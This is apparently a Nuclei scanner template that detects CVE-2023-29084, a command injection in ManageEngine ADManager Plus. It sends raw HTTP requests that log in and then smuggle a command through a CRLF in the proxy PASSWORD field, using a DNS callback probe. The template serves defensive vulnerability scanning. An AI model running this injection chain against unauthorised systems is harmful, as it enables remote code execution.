Description
Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
id: CVE-2023-29084
info:
name: ManageEngine ADManager Plus - Command Injection
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution, unauthorized access to sensitive information, or complete compromise of the target system.
remediation: |
Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus.
reference:
- https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
- https://community.grafana.com/t/release-notes-v6-3-x/19202
- http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html
- https://manageengine.com
- https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2023-29084
cwe-id: CWE-77
epss-score: 0.98167
epss-percentile: 0.99911
cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: zohocorp
product: manageengine_admanager_plus
tags: cve,cve2023,packetstorm,manageengine,admanager,rce,oast,authenticated,zohocorp,vuln
variables:
cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"
http:
- raw:
- |
POST /j_security_check HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Referer: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator
- |
GET /home.do HTTP/1.1
Host: {{Hostname}}
- |
POST /api/json/admin/saveServerSettings HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{BaseURL}}
Referer: {{BaseURL}}
params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"message":"'
- 'Proxy Settings'
condition: and
- type: word
part: interactsh_protocol
words:
- "dns"
extractors:
- type: kval
name: admpcsrf
internal: true
kval:
- admpcsrf
part: header
# digest: 4a0a0047304502201f6b6be04a0c139c73f719d25538012dfaef3a926235b2ad64803e7070dbd02c022100db7e7b49d24037294ef56474d35ef36a5df88b4180c912da410bb6a6383ec6d1:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.